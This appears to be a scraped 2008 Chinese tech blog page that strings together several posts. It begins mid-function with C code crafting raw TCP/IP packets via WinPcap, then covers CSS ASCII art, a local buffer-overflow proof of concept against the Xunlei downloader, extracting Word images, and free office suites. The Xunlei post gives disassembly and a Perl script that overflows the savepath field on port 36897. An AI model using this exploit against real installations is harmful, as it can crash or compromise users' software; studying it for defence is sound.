memcpy( Buffer, &PsdHeader, sizeof(PsdHeader) );
memcpy( Buffer + sizeof(PsdHeader), &TcpHeader, sizeof(TcpHeader) );
TcpHeader.th_sum = CheckSum( (unsigned short *)Buffer, sizeof(PsdHeader) + sizeof(TcpHeader) );

memset( Buffer, 0, sizeof(Buffer) );
memcpy( Buffer, &IpHeader, sizeof(IpHeader) );
IpHeader.checksum = CheckSum( (unsigned short *)Buffer, sizeof(IpHeader) );

memset( Buffer, 0, sizeof(Buffer) );
memcpy( Buffer, (void *)&EtHeader, sizeof(ET_HEADER) );
memcpy( Buffer + sizeof(ET_HEADER), (void *)&IpHeader, sizeof(IP_HEADER) );
memcpy( Buffer + sizeof(ET_HEADER) + sizeof(IP_HEADER), (void *)&TcpHeader, sizeof(TCP_HEADER) );

char errbuf[PCAP_ERRBUF_SIZE] = { 0 };
pcap_t *fp;
if ( (fp= pcap_open( InterfaceName, 100, PCAP_OPENFLAG_PROMISCUOUS, 100, NULL, errbuf ) ) == NULL )
{
fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", InterfaceName );
return -1;
}

if ( pcap_sendpacket( fp, Buffer, sizeof(Buffer) ) != 0 )
{
fprintf(stderr,"\nError sending the packet: \n", pcap_geterr(fp));
return -1;
}
printf( "send ok!\nData is:\n" );

for( int i = 0; i < sizeof(Buffer); i ++ )
{
printf( "%02x ", Buffer );
}

return 0;
}

基于CSS的ASCII艺术

Wed, 07 May 2008 16:29:41 +0800

ASCII 艺术是一种使用计算机可打印字符（一般为ASCII码中的96个可打印字符）表现图形的一种技术，传统的 ASCII 艺术基于 HTML 代码，然而由于不同浏览器的差别，在一种浏览器下可以完美显示的 ASCII 艺术，到了别的浏览器就面目全非，Web2.0 时代，应该多在 CSS 上做文章，因为目前主流浏览器对 CSS 的支持都非常一致，使用 CSS 实现 ASCII 艺术可以更好地保持不同浏览器间的兼容。

下面这个图很难想象是用 ASCII 艺术做出来的，当然为了简便，我使用的是图片，原始 ASCII 艺术版可在这里看到。

jpeg2css 是一个非常有趣的程序，你提供一副黑白的 JPG 图片给它，几秒种之内，可以为你生成一个 HTML 网页文件，你可以在该网页上看到和源 JPG 图片几乎一模一样的 ASCII 艺术图形，而且是基于 CSS 的，你不用担心该 ASCII 艺术在不同浏览器间的兼容问题。

更多基于 CSS 的 ASCII 艺术 （CSS 原始版可以在这里看到）

jpeg2css 下载地址：
http://www.romancortes.com/ficheros/jpeg2css.zip

本文素材来自：http://www.romancortes.com/blog/tag/css/
COMSHARP CMS编译

迅雷本地溢出POC

Wed, 07 May 2008 08:34:52 +0800

以前一直在传迅雷还有0day，Activex的应该差不多了，但是也不敢怠慢，还是卸载之，今天丰初发来一URL，原来素一迅雷0day，看说明还是远程！感觉装了一个，看那个漏洞监听的端口
C:\>netstat -na|find "36897"
TCP 127.0.0.1:36897 0.0.0.0:0 LISTENING

绑定的本地IP啊？！那就说明这个是不可以远程的，只能本地了。
......
23132CBE 68 B4C61323 push 2313C6B4 ; ASCII "savepath"
23132CC3 57 push edi
23132CC4 FFD6 call esi
23132CC6 59 pop ecx
23132CC7 84C0 test al, al

......

23132CEF 85FF test edi, edi
23132CF1 74 02 je short 23132CF5
23132CF3 8BCF mov ecx, edi
23132CF5 B8 D4C61323 mov eax, 2313C6D4 ; ASCII "XLDAP"
23132CFA 50 push eax
23132CFB 52 push edx
23132CFC 51 push ecx
23132CFD 50 push eax
23132CFE 8D85 5CFEFFFF lea eax, dword ptr [ebp-1A4]
23132D04 68 C0C61323 push 2313C6C0 ; ASCII "%s|%s|%s|%s"
......

根据上面可以分析出来这个端口接受数据的格式是XLDAP|A|B|XLDAP，A是方法，B是值。又偷懒看了下介绍，问题出在savepath方法上，那么构造数据就很简单了，POC如下：

#!/usr/bin/perl
use IO::Socket;

if ($socket = IO::Socket::INET->new(PeerAddr => "127.0.0.1",PeerPort => "36897",Proto => "TCP"))
{
$exploit = "XLDAP|savepath|".
# ("A" x 397).
("A" x 500).
"|XLDAP";

print $socket $exploit;
sleep(1);
close($socket);
}
else
{
print "Cannot connect to localhost:36897 port\n";
}

如果用python写exp的话你会很郁闷，因为py总是会给偶多出一个换行，就算使用[:-1]这种方法也没用，郁闷，目前不清楚是传递的过程还是print的时候，谁知道是什么原因？
23132D09 50 push eax
23132D0A FF15 54E51323 call dword ptr [<&MSVCRT.sprintf>] ; crash
23132D10 8D85 5CFEFFFF lea eax, dword ptr [ebp-1A4]
就是在执行这步sprintf函数复制的时候导致crash。

快速提取Word中的图片

Tue, 06 May 2008 12:26:08 +0800

今天在做一个PPT，想到了一个素材，记得是在一个Word中，马上打开这个Word，和平常一样直接复制，奇怪是，我复制过去的是一个白底图片，只有一个大红X。

这下把我郁闷了，咋就不能复制了？郁闷的我，把Wrod的图片选项打开看了又看，什么都没有啊。于是就把Word的选项打开看，刚打开文件，眼前一亮，看到了另存为网页，一个邪恶想法出现了。

立马打开文件，另存为，把文件另存为了网页，到目录一看，多了一个文件名.file的文件夹，打开一看，HOHO，不都是这个Word文档中的图片，这以后可就又多了一个“盗版”的方法。

另外，我还不知道那个word中的图片是怎么做成那样的，那位知道，给我留个言。

点备案号边上的给我留言，或地址：
http://v3.tongji.cn.yahoo.com/note.html?unit_id=12713&url=http%3A//www.woidiy.com/blog/default.asp

6大免费Office办公套件

Mon, 05 May 2008 14:56:33 +0800

微软的Office办公套件是市场上占有率最高的办公软件,可是这款商业软件价格昂贵,正版对于大多数国内电脑用户来说都无法承受.不过近些年来MS Office的竞争对手也越来越多,而且产品质量上也有长足的进步,许多在功能上还有可喜的创新.下面是比较流行的6大Office办公套件,包括在线和桌面两种类型.

在线版免费办公套件

1.Google Docs

Google的在线Office套件也许是MS Office最大的竞争对手,在Google前不久发布了Google Presentation之后,电子文档,电子表格和演示文稿三大套件悉数到齐,可谓一个里程碑.Google Docs也可以说是目前质量最好的在线Office套件.

2.Zoho

Zoho是一个专注在线办公应用程序的网站,旗下的产品是几大在线办公软件提供商中最完整的一个.前不久还发布了Zoho DB,一个在线数据库管理软件.

3.ThinkFree

ThinkFree最大的特点是和MS Office的兼容性和界面的相似性.同时具有非常不错的协作功能.

桌面版免费办公套件

4.StarOffice

Sun出品的Office办公套件,能够通过Google Pack下载免费版本.StarOffice支持Windows,Linux和Solaris,Mac下需要下载StarOffice的师兄Open Office.

5.IBM Lotus Symphony

IBM前不久发布的Office办公套件,针对个人和企业用户.拥有Office最常见的三大套件.

6.OpenOffice

Linux下最流行的OpenOffice是一个跨平台多语言的Office套件,和MS Office有着较好的兼容性,包括Writer,Impress(演示文稿),Math,Draw,Calc(电子表格)和Base(数据库). StarOffice和IBM Lotus Symphony都是基于OpenOffice的源代码开发而成.

来自MakeUseOf